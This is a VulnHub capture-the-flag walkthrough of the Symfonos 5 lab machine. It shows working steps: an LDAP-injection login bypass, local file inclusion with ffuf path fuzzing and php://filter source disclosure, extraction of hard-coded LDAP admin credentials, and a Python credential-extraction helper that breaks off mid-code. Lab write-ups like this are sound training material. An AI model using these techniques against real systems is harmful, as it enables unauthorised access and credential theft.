Symfonos 5 || VulnHub Walkthrough

Hello, everyone! Welcome back to our VulnHub Walkthrough series. In today's video we continue with the symfonos collection, this time the fifth machine, SymfonOS 5. It is rated intermediate and built to feel like an OSCP-style, real-world target; its point is to show how several small weaknesses (a login that can be bypassed, a file inclusion, credentials left in source code and in a directory) chain into a foothold. Let's get started!

To begin, head over to the VulnHub website and download the machine's image file. If you're new to VulnHub, check out our playlist for helpful guides on how to use the platform. 


Now, let’s get started with exploiting this machine!


Setting Up

In an earlier video we downloaded the image files for all six machines in the series.

The next step is to import SymfonOS 5 into VirtualBox. The download is a 7z archive, so extract it first; among the extracted files you will find the VMDK virtual disk, which is the only part VirtualBox needs.

Now, our next step is creating a new virtual machine.


Creating a New VM

In VirtualBox, click "New" to create a new VM. 

Name it "SymfonOS 5", set the type to Linux and the version to "Other Linux (64-bit)", since the archive does not say which distribution is inside (the SSH banner later identifies it as Debian 10).

Now, allocate the desired amount of RAM.

Next, select "Use an existing virtual hard disk file", locate the VMDK file, and click "Finish" to complete the setup.

Once the setup is finished, you'll see the " SymfonOS 5 " vulnerable machine in the VirtualBox manager. For better organization, let me regroup it into the VulnHub group.



Network Configuration

For the Kali Linux attacker and the vulnerable machine to reach each other, both must be on the same network. A host-only adapter is the right choice: it puts both VMs on a private network with the host, and it keeps a deliberately vulnerable machine off your real LAN.

So go to "Settings" and change the network adapter to "Host-only Adapter" (check that the Kali VM uses the same host-only network).

Since everything is ready, let’s attempt to start the VM to check if it works.


Start the VM

Once it has booted you should see a login prompt. We do not need those credentials; the prompt just confirms the machine is up and we can begin from the attacker side. Let's dive into the fun!


Enumeration


Identify the IP address.

The first step is enumeration: find the target's IP address. We use netdiscover, which sends ARP requests across the subnet and lists every host that answers. Because it works at layer 2 it only sees machines on the same segment, which is exactly our host-only network.

Open a terminal and run netdiscover -i <interface>, where the interface is the one attached to the host-only network; in this case that is eth1.

┌──(kali㉿kali)-[~]
└─$ sudo netdiscover -i eth1

 Currently scanning: 192.168.200.0/16   |   Screen View: Unique Hosts                                                                                    
                                                                                                                                                         
 4 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 240                                                                                         
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.103.2   08:00:27:b8:5c:2b      2     120  PCS Systemtechnik GmbH                                                                                
 192.168.103.1   0a:00:27:00:00:14      1      60  Unknown vendor                                                                                        
 192.168.103.17  08:00:27:4a:bc:90      1      60  PCS Systemtechnik GmbH   

The output lists every host that answered, with its IP address, MAC address and the vendor derived from the MAC prefix. The 08:00:27 prefix (PCS Systemtechnik GmbH) is the OUI VirtualBox assigns to guests; the 0a:00:27 address on .1 is the host-only adapter on the host itself, and .2 is VirtualBox's DHCP server for that network.

That leaves one candidate: our target's IP address is 192.168.103.17.


Mapping the Network

Next we scan the target for open ports, the core of the enumeration phase. Open ports define the attack surface and tell us which services to dig into. For this we use Nmap.

Open a terminal and run: nmap -sC -sV <target IP address>

┌──(kali㉿kali)-[~]
└─$ nmap -sC -sV 192.168.103.17

In this command:

  • -sC: Runs Nmap's default NSE scripts against each open port to collect extra detail (SSH host keys, the HTTP title and server header, and so on).
  • -sV: Enables version detection to determine the versions of services running on open ports.

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-01 11:18 EST
Nmap scan report for 192.168.103.17
Host is up (0.00071s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 16:70:13:77:22:f9:68:78:40:0d:21:76:c1:50:54:23 (RSA)
|   256 a8:06:23:d0:93:18:7d:7a:6b:05:77:8d:8b:c9:ec:02 (ECDSA)
|_  256 52:c0:83:18:f4:c7:38:65:5a:ce:97:66:f3:75:68:4c (ED25519)
80/tcp  open  http     Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
389/tcp open  ldap     OpenLDAP 2.2.X - 2.3.X
636/tcp open  ldapssl?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.09 seconds
                                                                                                                                                          
┌──(kali㉿kali)-[~]
└─$ 

After the scan completes, four open ports are reported:

  1. Port 22 (TCP): OpenSSH 7.9p1 on Debian 10. Remote access with valid credentials; it becomes useful the moment we find a username and password elsewhere.
  2. Port 80 (TCP): Apache httpd 2.4.29 serving a page with no title. Note that the Apache banner says Ubuntu while the SSH banner says Debian 10, a reminder that a single service banner is not reliable OS fingerprinting. Web applications are the usual way in, so this is where we start.
  3. Port 389 (TCP): OpenLDAP. Nmap's version guess (2.2.X - 2.3.X) is rough and should not be read into. What matters is that a directory service next to a web login strongly suggests the site authenticates against LDAP; later it is also worth checking whether the server allows anonymous binds and what its base DN is.
  4. Port 636 (TCP): LDAP over TLS. The trailing question mark in ldapssl? means Nmap saw the port open but could not fingerprint the service.

These are our entry points. The next step is deeper enumeration of each service, starting with the web server, to find a vulnerability or a clue that leads to initial access.


Web Enumeration

Our next steps involve identifying vulnerabilities to gain shell access or another foothold on the target system. Since the HTTP web server is running on Port 80, we’ll start by analyzing it, as web services often serve as primary access points and can reveal additional attack vectors. 

Access the web service by entering the target's IP address directly into a web browser. 

The page shows only an image of Zeus. The symfonos machines are themed on Greek mythology, and a name shown this prominently is worth writing down as a candidate username.


Examining the page source by pressing CTRL + U does not reveal any hidden details. 


Directory Enumeration

To locate hidden resources, we will perform directory enumeration using tools like dirb or Gobuster. These tools systematically probe for common directory and file names that are not directly visible on the website. This process can uncover sensitive files or directories that facilitate further exploitation. 

Execute the following command in the terminal:

┌──(kali㉿kali)-[~]
└─$ dirb http://192.168.103.17/

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sun Dec  1 11:21:31 2024
URL_BASE: http://192.168.103.17/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.103.17/ ----
+ http://192.168.103.17/admin.php (CODE:200|SIZE:1650)                                                                                                   
+ http://192.168.103.17/index.html (CODE:200|SIZE:207)                                                                                                   
+ http://192.168.103.17/server-status (CODE:403|SIZE:279)                                                                                                
==> DIRECTORY: http://192.168.103.17/static/                                                                                                             
                                                                                                                                                         
---- Entering directory: http://192.168.103.17/static/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
-----------------
END_TIME: Sun Dec  1 11:21:35 2024
DOWNLOADED: 4612 - FOUND: 3
                                                                                                                                                          
┌──(kali㉿kali)-[~]
└─$ 

dirb finds /admin.php, /index.html and /server-status (403: Apache's status page, not accessible to us), plus a listable /static/ directory, which is worth browsing by hand. /admin.php stands out: a page with that name is usually an administrative or control panel, and getting into it would give significant control over the site.

It turns out to be a login form. Guessing default credentials such as admin:admin and admin:password fails.


Bypass Login using LDAP injection

However, a login form in front of an LDAP server is a textbook candidate for LDAP injection, so before brute-forcing it we test whether the form's input reaches an LDAP search filter unescaped. The approach is the same as for SQL injection: send characters that have meaning in the filter syntax and watch how the response changes.

From the Nmap scan we know OpenLDAP is listening on port 389.

That makes it likely that admin.php validates the username and password with an LDAP search rather than against a database, so the payloads to try are ones that change the meaning of a search filter.

The quickest test is a single asterisk (*) in both the username and the password field. In an LDAP filter an unescaped * is a wildcard, so an assertion like (userPassword=*) means "any entry that has a password" instead of "an entry with this password". If the application treats "the search returned something" as a successful login, the wildcard alone is enough.

It was: the page let us in, confirming both that authentication can be bypassed and that admin.php is the site's control panel.
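To make the bypass concrete, here is an added example in Python (my code, not part of the walkthrough and not the real admin.php) that mimics the assumed shape of the vulnerable query, (&(uid=<user>)(userPassword=<pass>)) built by string concatenation, evaluates the resulting filter against a small constructed in-memory directory, and shows the same query with RFC 4515 escaping applied. The filter shape, the tiny evaluator and the second account are assumptions for illustration; only the zeus credentials come from later in this write-up.

```python
import re
from fnmatch import fnmatchcase

# Constructed stand-in for the directory behind admin.php (the real one is the
# OpenLDAP server on port 389). The zeus password is the one recovered later in
# the walkthrough; the second account is made up.
DIRECTORY = [
    {"uid": "zeus", "userPassword": "cetkKf4wCuHC9FET"},
    {"uid": "hera", "userPassword": "Olympus!2020"},
]


def build_filter_unsafe(user, password):
    """Assumed shape of the vulnerable query: form fields concatenated into the
    filter. The page does not show admin.php's real code; this is the classic
    pattern that the wildcard bypass relies on."""
    return f"(&(uid={user})(userPassword={password}))"


def ldap_escape(value):
    """RFC 4515 escaping: every filter metacharacter becomes a \\XX hex escape,
    so user input can only ever be an assertion value, never filter syntax."""
    return "".join("\\%02x" % ord(c) if c in "\\*()\x00" else c for c in value)


def build_filter_safe(user, password):
    return build_filter_unsafe(ldap_escape(user), ldap_escape(password))


# --- a minimal evaluator so the two filters can be compared offline ---------
_ASSERTION = re.compile(r"\((\w+)=([^()]*)\)")


def _unescape(value):
    return re.sub(r"\\([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), value)


def _glob_literal(text):
    # Protect fnmatch metacharacters so an escaped '*' stays a literal.
    return re.sub(r"([*?\[])", r"[\1]", text)


def _matches(attr_value, pattern):
    """Evaluate one (attr=pattern) assertion the way the server does: an
    unescaped '*' is a wildcard (presence or substring match), '\\2a' is a
    literal asterisk. Case-sensitive here; real matching rules vary per attribute."""
    pieces = re.split(r"(?<!\\)\*", pattern)
    if len(pieces) == 1:
        return attr_value == _unescape(pattern)
    glob = "*".join(_glob_literal(_unescape(p)) for p in pieces)
    return fnmatchcase(attr_value, glob)


def search(ldap_filter, directory=DIRECTORY):
    """Entries matching an AND filter of equality/substring assertions.
    (Only this filter shape is supported; it is all the example needs.)"""
    assertions = _ASSERTION.findall(ldap_filter)
    return [entry for entry in directory
            if all(attr in entry and _matches(entry[attr], pat)
                   for attr, pat in assertions)]


def login(user, password, escape):
    """The application's bug: 'the search returned at least one entry' is
    treated as 'the password was right'."""
    build = build_filter_safe if escape else build_filter_unsafe
    return len(search(build(user, password))) > 0


if __name__ == "__main__":
    for user, pw in [("*", "*"), ("zeus", "*"), ("zeus", "wrong")]:
        print(f"{user!r}/{pw!r}: unsafe={login(user, pw, False)} safe={login(user, pw, True)}")
```

With escaping, the asterisks arrive at the server as \2a and are compared literally, so the wildcard login fails while the real credentials still work. The other half of the fix is not shown in the evaluator but matters just as much: a login should bind as the user (or compare the password) rather than treat a non-empty search result as proof of identity.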


Enumerate Dashboard for Potential Vulnerability

The header displayed navigation links labeled, "Home," "Portraits," and "Logout." The main content area showed a single message: "Under Development," indicating that the website was still in the development phase and likely not fully functional.

Clicking on "Portraits" revealed an interesting functionality. 

The link points to home.php?url=http://127.0.0.1/portraits.php, so home.php takes a url parameter and loads whatever it names.

A parameter that carries a full URL is the shape of a Server-Side Request Forgery (SSRF); if the same code path also accepts a local path, it is a Local File Inclusion (LFI) as well.


Exploitation 

To tell the two apart, replace the URL with a local path and see what comes back. /etc/passwd is the standard first test: it is world-readable, present on every Unix host, and easy to recognise in the output.

The server returned the contents of /etc/passwd inside the page.

That settles it: the value is handed straight to a file-loading function that accepts local paths, so this is an LFI. The http:// default means the same parameter may double as SSRF, but reading local files is the more direct route, so that is what we pursue.


Leveraging FFUF to Identify LFI File Paths

To find out which other files are readable, and ideally one that gives us a foothold, we brute-force paths through the vulnerable parameter with ffuf.

Two things are needed first: a session cookie and a wordlist.

The LFI sits behind the login, so every request needs a valid session cookie. Without it, every path is answered with the login page (the same response for everything), and the results would be meaningless.

Open the browser's developer tools (usually F12), go to the Storage or Network tab, and copy the PHPSESSID cookie value.

For the wordlist we use the LFI list from SecLists. It is not installed on Kali by default; either install the seclists package or fetch the file (Fuzzing/LFI/LFI-LFISuite-pathtotest-huge.txt) from https://github.com/danielmiessler/SecLists.


We executed the following command, 

┌──(kali㉿kali)-[~]
└─$ ffuf -u 'http://192.168.103.17/home.php?url=FUZZ' -b 'PHPSESSID=ouhchfm3povipficctivmdi81h' -w /home/kali/Downloads/LFI-LFISuite-pathtotest-huge.txt -c -fw 117

where:

  • -u is used to specify the target URL with FUZZ as the placeholder for brute-forcing.
  • -b  is used to provide the session cookie for authentication.
  • -w  is used to point to the wordlist used for testing file paths.
  • -c  is used to enable colored output for easier result interpretation.
  • -fw 117 drops every response that contains exactly 117 words, which is what home.php returns when the requested file cannot be loaded. Without this filter every wordlist entry comes back as a 200 and the output is useless; find the right number by running once without the filter and reading the word count of the noise. (The video shows this step.)

After filtering, only paths that actually returned a file remain. Opening each in the browser confirms the content.


        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.103.17/home.php?url=FUZZ
 :: Wordlist         : FUZZ: /home/kali/Downloads/LFI-LFISuite-pathtotest-huge.txt
 :: Header           : Cookie: PHPSESSID=ouhchfm3povipficctivmdi81h
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response words: 117
________________________________________________

/etc/passwd             [Status: 200, Size: 1861, Words: 121, Lines: 48, Duration: 12ms]
/etc/group              [Status: 200, Size: 1397, Words: 116, Lines: 69, Duration: 10ms]
../../../../etc/group   [Status: 200, Size: 1397, Words: 116, Lines: 69, Duration: 6ms]
../../../etc/group      [Status: 200, Size: 1397, Words: 116, Lines: 69, Duration: 6ms]
../../../../../etc/group [Status: 200, Size: 1397, Words: 116, Lines: 69, Duration: 10ms]
../../../../../../../etc/group [Status: 200, Size: 1397, Words: 116, Lines: 69, Duration: 8ms]
../../../../../../../../etc/group [Status: 200, Size: 1397, Words: 116, Lines: 69, Duration: 7ms]
../../../../../../etc/group [Status: 200, Size: 1397, Words: 116, Lines: 69, Duration: 10ms]
../../../../../../../../../etc/group [Status: 200, Size: 1397, Words: 116, Lines: 69, Duration: 8ms]
../../../../../../../../../../etc/group [Status: 200, Size: 1397, Words: 116, Lines: 69, Duration: 4ms]
../../../../../../../../../../../../../../../../../etc/group [Status: 200, Size: 1397, Words: 116, Lines: 69, Duration: 2ms]
../../../../../../../../../../../../../../../../etc/group [Status: 200, Size: 1397, Words: 116, Lines: 69, Duration: 2ms]
../../../../../../../../../../../etc/group [Status: 200, Size: 1397, Words: 116, Lines: 69, Duration: 5ms]
../../../../../../../../../../../../../etc/group [Status: 200, Size: 1397, Words: 116, Lines: 69, Duration: 5ms]
../../../../../../../../../../../../../../etc/group [Status: 200, Size: 1397, Words: 116, Lines: 69, Duration: 7ms]
../../../../../../../../../../../../../../../etc/group [Status: 200, Size: 1397, Words: 116, Lines: 69, Duration: 7ms]
../../../../../../../../../../../../etc/group [Status: 200, Size: 1397, Words: 116, Lines: 69, Duration: 7ms]
../../../../../../../../../../../../../../../../../../etc/group [Status: 200, Size: 1397, Words: 116, Lines: 69, Duration: 17ms]
../../../../../../../../../proc/self/cmdline [Status: 200, Size: 967, Words: 116, Lines: 29, Duration: 4ms]
../../../../../../proc/self/cmdline [Status: 200, Size: 967, Words: 116, Lines: 29, Duration: 8ms]
../../../proc/self/cmdline [Status: 200, Size: 967, Words: 116, Lines: 29, Duration: 11ms]
../../../../../../../proc/self/cmdline [Status: 200, Size: 967, Words: 116, Lines: 29, Duration: 9ms]
../../../../proc/self/cmdline [Status: 200, Size: 967, Words: 116, Lines: 29, Duration: 12ms]
../../../../../proc/self/cmdline [Status: 200, Size: 967, Words: 116, Lines: 29, Duration: 11ms]
../../../../../../../../../../proc/self/cmdline [Status: 200, Size: 967, Words: 116, Lines: 29, Duration: 7ms]
../../../../../../../../../../../../proc/self/cmdline [Status: 200, Size: 967, Words: 116, Lines: 29, Duration: 6ms]
../../../../../../../../proc/self/cmdline [Status: 200, Size: 967, Words: 116, Lines: 29, Duration: 12ms]
../../../../../../../../../../../../../../../../proc/self/cmdline [Status: 200, Size: 967, Words: 116, Lines: 29, Duration: 4ms]
/proc/self/cmdline      [Status: 200, Size: 967, Words: 116, Lines: 29, Duration: 22ms]
../../../../../../../../../../../../../../proc/self/cmdline [Status: 200, Size: 967, Words: 116, Lines: 29, Duration: 7ms]
../../../../../../../../../../../../../../../../../../proc/self/cmdline [Status: 200, Size: 967, Words: 116, Lines: 29, Duration: 4ms]
../../../../../../../../../../../../../../../proc/self/cmdline [Status: 200, Size: 967, Words: 116, Lines: 29, Duration: 8ms]
../../../../../../../../../../../../../proc/self/cmdline [Status: 200, Size: 967, Words: 116, Lines: 29, Duration: 11ms]
../../../../../../../../../../../proc/self/cmdline [Status: 200, Size: 967, Words: 116, Lines: 29, Duration: 13ms]
../../../../../../../../../../../../../../../../../proc/self/cmdline [Status: 200, Size: 967, Words: 116, Lines: 29, Duration: 10ms]
/proc/self/stat         [Status: 200, Size: 1243, Words: 167, Lines: 30, Duration: 7ms]
../../../../proc/self/stat [Status: 200, Size: 1243, Words: 167, Lines: 30, Duration: 6ms]
../../../proc/self/stat [Status: 200, Size: 1244, Words: 167, Lines: 30, Duration: 9ms]
../../../../../../../../../../../proc/self/stat [Status: 200, Size: 1244, Words: 167, Lines: 30, Duration: 4ms]
../../../../../../../../../../../../proc/self/stat [Status: 200, Size: 1243, Words: 167, Lines: 30, Duration: 2ms]
../../../../../../../proc/self/stat [Status: 200, Size: 1243, Words: 167, Lines: 30, Duration: 10ms]
../../../../../../../../../../../../../proc/self/stat [Status: 200, Size: 1243, Words: 167, Lines: 30, Duration: 3ms]
../../../../../proc/self/stat [Status: 200, Size: 1243, Words: 167, Lines: 30, Duration: 13ms]
../../../../../../../../proc/self/stat [Status: 200, Size: 1243, Words: 167, Lines: 30, Duration: 9ms]
../../../../../../proc/self/stat [Status: 200, Size: 1244, Words: 167, Lines: 30, Duration: 14ms]
../../../../../../../../../proc/self/stat [Status: 200, Size: 1243, Words: 167, Lines: 30, Duration: 11ms]
../../../../../../../../../../../../../../../../proc/self/stat [Status: 200, Size: 1243, Words: 167, Lines: 30, Duration: 6ms]
../../../../../../../../../../proc/self/stat [Status: 200, Size: 1243, Words: 167, Lines: 30, Duration: 13ms]
../../../../../../../../../../../../../../../../../proc/self/stat [Status: 200, Size: 1244, Words: 167, Lines: 30, Duration: 9ms]
../../../../../../../../../../../../../../../../../../proc/self/stat [Status: 200, Size: 1243, Words: 167, Lines: 30, Duration: 10ms]
../../../../../../../../../../../../../../proc/self/stat [Status: 200, Size: 1244, Words: 167, Lines: 30, Duration: 15ms]
../../../../../../../../../../../../../../../proc/self/stat [Status: 200, Size: 1243, Words: 167, Lines: 30, Duration: 15ms]
../../../proc/self/status [Status: 200, Size: 1945, Words: 207, Lines: 83, Duration: 3ms]
/proc/self/status       [Status: 200, Size: 1946, Words: 207, Lines: 83, Duration: 13ms]
../../../../../proc/self/status [Status: 200, Size: 1945, Words: 207, Lines: 83, Duration: 2ms]
../../../../proc/self/status [Status: 200, Size: 1946, Words: 207, Lines: 83, Duration: 6ms]
../../../../../../../../../../../../proc/self/status [Status: 200, Size: 1945, Words: 207, Lines: 83, Duration: 1ms]
../../../../../../../../proc/self/status [Status: 200, Size: 1946, Words: 207, Lines: 83, Duration: 6ms]
../../../../../../../proc/self/status [Status: 200, Size: 1945, Words: 207, Lines: 83, Duration: 7ms]
../../../../../../proc/self/status [Status: 200, Size: 1944, Words: 207, Lines: 83, Duration: 6ms]
../../../../../../../../../../../proc/self/status [Status: 200, Size: 1944, Words: 207, Lines: 83, Duration: 3ms]
../../../../../../../../../../proc/self/status [Status: 200, Size: 1946, Words: 207, Lines: 83, Duration: 5ms]
../../../../../../../../../proc/self/status [Status: 200, Size: 1945, Words: 207, Lines: 83, Duration: 11ms]
../../../../../../../../../../../../../proc/self/status [Status: 200, Size: 1946, Words: 207, Lines: 83, Duration: 7ms]
../../../../../../../../../../../../../../../../proc/self/status [Status: 200, Size: 1944, Words: 207, Lines: 83, Duration: 7ms]
../../../../../../../../../../../../../../../proc/self/status [Status: 200, Size: 1944, Words: 207, Lines: 83, Duration: 8ms]
../../../../../../../../../../../../../../../../../../proc/self/status [Status: 200, Size: 1945, Words: 207, Lines: 83, Duration: 9ms]
../../../../../../../../../../../../../../../../../proc/self/status [Status: 200, Size: 1946, Words: 207, Lines: 83, Duration: 15ms]
../../../../../../../../../../../../../../proc/self/status [Status: 200, Size: 1945, Words: 207, Lines: 83, Duration: 18ms]
/proc/self/fd/11        [Status: 200, Size: 948, Words: 116, Lines: 29, Duration: 11ms]
../../../proc/self/fd/11 [Status: 200, Size: 948, Words: 116, Lines: 29, Duration: 11ms]
../../../../../../../../../../proc/self/fd/11 [Status: 200, Size: 948, Words: 116, Lines: 29, Duration: 2ms]
../../../../../../../../../proc/self/fd/11 [Status: 200, Size: 948, Words: 116, Lines: 29, Duration: 3ms]
../../../../../../../../proc/self/fd/11 [Status: 200, Size: 948, Words: 116, Lines: 29, Duration: 6ms]
../../../../../../../../../../../proc/self/fd/11 [Status: 200, Size: 948, Words: 116, Lines: 29, Duration: 4ms]
../../../../../../../../../../../../../proc/self/fd/11 [Status: 200, Size: 948, Words: 116, Lines: 29, Duration: 3ms]
../../../../proc/self/fd/11 [Status: 200, Size: 948, Words: 116, Lines: 29, Duration: 13ms]
../../../../../../proc/self/fd/11 [Status: 200, Size: 948, Words: 116, Lines: 29, Duration: 12ms]
../../../../../../../../../../../../../../proc/self/fd/11 [Status: 200, Size: 948, Words: 116, Lines: 29, Duration: 5ms]
../../../../../../../../../../../../proc/self/fd/11 [Status: 200, Size: 948, Words: 116, Lines: 29, Duration: 7ms]
../../../../../../../proc/self/fd/11 [Status: 200, Size: 948, Words: 116, Lines: 29, Duration: 12ms]
../../../../../proc/self/fd/11 [Status: 200, Size: 948, Words: 116, Lines: 29, Duration: 15ms]
../../../../../../../../../../../../../../../proc/self/fd/11 [Status: 200, Size: 948, Words: 116, Lines: 29, Duration: 7ms]
../../../../../../../../../../../../../../../../../proc/self/fd/11 [Status: 200, Size: 948, Words: 116, Lines: 29, Duration: 6ms]
../../../../../../../../../../../../../../../../proc/self/fd/11 [Status: 200, Size: 948, Words: 116, Lines: 29, Duration: 7ms]
../../../../../../../../../../../../../../../../../../proc/self/fd/11 [Status: 200, Size: 948, Words: 116, Lines: 29, Duration: 7ms]
../../../../../../../../../../../../etc/passwd [Status: 200, Size: 1861, Words: 121, Lines: 48, Duration: 928ms]
../../../../../../../../../../etc/passwd [Status: 200, Size: 1861, Words: 121, Lines: 48, Duration: 931ms]
../../../../../../../../../../../../../etc/passwd [Status: 200, Size: 1861, Words: 121, Lines: 48, Duration: 956ms]
../../../../../../../../../../../etc/passwd [Status: 200, Size: 1861, Words: 121, Lines: 48, Duration: 1950ms]
../../../../../../etc/passwd [Status: 200, Size: 1861, Words: 121, Lines: 48, Duration: 1971ms]
../../../../../../../../../../../../../../etc/passwd [Status: 200, Size: 1861, Words: 121, Lines: 48, Duration: 1979ms]
../../../../../etc/passwd [Status: 200, Size: 1861, Words: 121, Lines: 48, Duration: 1990ms]
../../../etc/passwd     [Status: 200, Size: 1861, Words: 121, Lines: 48, Duration: 2015ms]
../../../../../../../../../../../../../../../../etc/passwd [Status: 200, Size: 1861, Words: 121, Lines: 48, Duration: 2026ms]
../../../../../../../../../etc/passwd [Status: 200, Size: 1861, Words: 121, Lines: 48, Duration: 2054ms]
../../../../etc/passwd  [Status: 200, Size: 1861, Words: 121, Lines: 48, Duration: 2070ms]
../../../../../../../../etc/passwd [Status: 200, Size: 1861, Words: 121, Lines: 48, Duration: 2114ms]
../../../../../../../etc/passwd [Status: 200, Size: 1861, Words: 121, Lines: 48, Duration: 2133ms]
../../../../../../../../../../../../../../../../../etc/passwd [Status: 200, Size: 1861, Words: 121, Lines: 48, Duration: 2139ms]
../../../../../../../../../../../../../../../etc/passwd [Status: 200, Size: 1861, Words: 121, Lines: 48, Duration: 2193ms]
../../../../../../../../../../../../../../../../../../etc/passwd [Status: 200, Size: 1861, Words: 121, Lines: 48, Duration: 2226ms]
:: Progress: [9513/9513] :: Job [1/1] :: 1081 req/sec :: Duration: [0:00:08] :: Errors: 0 ::
                                                                                                                                                          
┌──(kali㉿kali)-[~]
└─$ 

Two things stand out in this output. First, every ../ variant returned exactly the same file as the plain absolute path, so the parameter is used as-is: no prefix, no appended extension, no traversal needed. That is also why a PHP stream wrapper works below. Second, nothing found so far is useful on its own: /etc/passwd and /etc/group give account and group names but no secrets, /etc/shadow does not appear (as expected for a file the web server user cannot read), and the /proc/self entries only describe the Apache process. We need another angle.


Investigating the Web file source code

The next idea is to read the PHP source files themselves. admin.php in particular has to know how to talk to LDAP, and that usually means a hard-coded bind DN and password.

Requesting a .php file through the url parameter does not help: the include executes it and we only get its rendered output. The way around this is the php://filter stream wrapper.

php://filter/convert.base64-encode/resource=<file> makes PHP run the file through a Base64 encoder before the include sees it. The encoded text contains no PHP tags, so nothing executes, and the raw source comes back as one Base64 blob embedded in the page.

We used this to pull the source of the PHP files.

The server returned the Base64-encoded file, but copying the blob out of the browser by hand is tedious and error-prone.

Instead we use curl to fetch the page and save the response to a local file for decoding.

Two details matter here:

  • The session cookie (--cookie) is still required; without it the request is answered with the login page.
  • -o writes the response to a file for the decoding step.

┌──(kali㉿kali)-[~]
└─$ curl 'http://192.168.103.17/home.php?url=php://filter/convert.base64-encode/resource=home.php' --cookie 'PHPSESSID=ouhchfm3povipficctivmdi81h' -o home.php
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  2547  100  2547    0     0   140k      0 --:--:-- --:--:-- --:--:--  146k
                                                                                                                                                          
┌──(kali㉿kali)-[~]
└─$

The saved file is the whole home.php page with the Base64 blob embedded in it. Open it in a text editor, copy the blob and decode it.

Decode locally, with the base64 utility already on Kali (base64 -d, as we do later for the LDAP password), rather than with an online decoder: the decoded text is the target's source code and may contain credentials, which should not be pasted into a third-party web site during an engagement.

Decoding home.php gives its full source, but nothing sensitive is in it.

We then repeated the same process with admin.php

┌──(kali㉿kali)-[~]
└─$ curl 'http://192.168.103.17/home.php?url=php://filter/convert.base64-encode/resource=admin.php' --cookie 'PHPSESSID=ouhchfm3povipficctivmdi81h' -o admin.php
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  4603  100  4603    0     0  1879k      0 --:--:-- --:--:-- --:--:-- 2247k
                                                                                                                                                          
┌──(kali㉿kali)-[~]
└─$

This time the source is interesting: admin.php contains hard-coded LDAP credentials.

The authLdap function binds to the directory with:

  • Bind DN: cn=admin,dc=symfonos,dc=local
  • Password: qMDdyZh3cT6eeAWD

This is the directory administrator's account. Binding with it lets us read the whole tree, including attributes that anonymous or ordinary users cannot see, and very likely modify it as well.
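Here is an added helper in Python (my code, not from the walkthrough) that does the source-disclosure loop in one place: it builds the php://filter URL for a given file, pulls the Base64 blob out of the surrounding home.php HTML, decodes it, and greps the result for ldap_bind() calls with literal credentials, the pattern that gave up the admin password above. The network fetch assumes the target URL and cookie used in this write-up. The sample response is constructed so the example runs offline; the PHP inside it is a guess at what authLdap() looks like, not the file from the VM, and only the DN and password in it are the ones actually found.

```python
import base64
import re
import urllib.parse
import urllib.request

# Target details as used in this write-up; adjust for your own lab.
BASE_URL = "http://192.168.103.17/home.php"
COOKIE = "PHPSESSID=ouhchfm3povipficctivmdi81h"


def filter_url(base_url, resource):
    """URL that makes include() receive the Base64 of `resource` instead of
    executing it: php://filter/convert.base64-encode/resource=<file>."""
    wrapper = f"php://filter/convert.base64-encode/resource={resource}"
    return f"{base_url}?{urllib.parse.urlencode({'url': wrapper})}"


_B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def extract_source(page_html):
    """home.php wraps the included content in its own header/nav/footer, so the
    response is HTML with one long Base64 run inside. Take the longest run,
    repair any stripped padding and decode it."""
    runs = _B64_RUN.findall(page_html)
    if not runs:
        raise ValueError("no Base64 blob in response (expired cookie? bad path?)")
    blob = max(runs, key=len)
    blob += "=" * (-len(blob) % 4)
    return base64.b64decode(blob).decode("utf-8", errors="replace")


# ldap_bind($conn, "<bind dn>", "<password>") with literal strings
_LDAP_BIND = re.compile(
    r"""ldap_bind\s*\(\s*\$\w+\s*,\s*["']([^"']+)["']\s*,\s*["']([^"']+)["']""")


def find_ldap_credentials(php_source):
    """(bind DN, password) pairs hard-coded into ldap_bind() calls."""
    return _LDAP_BIND.findall(php_source)


def fetch_source(resource, base_url=BASE_URL, cookie=COOKIE):
    """Live use: fetch through the vulnerable parameter with the session cookie."""
    req = urllib.request.Request(filter_url(base_url, resource),
                                 headers={"Cookie": cookie})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return extract_source(resp.read().decode("utf-8", errors="replace"))


# Constructed sample response so the example runs offline. The PHP is a guess at
# what authLdap() in admin.php looks like, NOT the file from the VM; only the DN
# and password are the ones the walkthrough found.
SAMPLE_PHP = (
    "<?php\n"
    "function authLdap($user, $pass) {\n"
    '    $ds = ldap_connect("ldap://localhost");\n'
    '    return ldap_bind($ds, "cn=admin,dc=symfonos,dc=local", "qMDdyZh3cT6eeAWD");\n'
    "}\n"
)
SAMPLE_RESPONSE = ("<html><body><nav>Home Portraits Logout</nav>\n"
                   + base64.b64encode(SAMPLE_PHP.encode()).decode()
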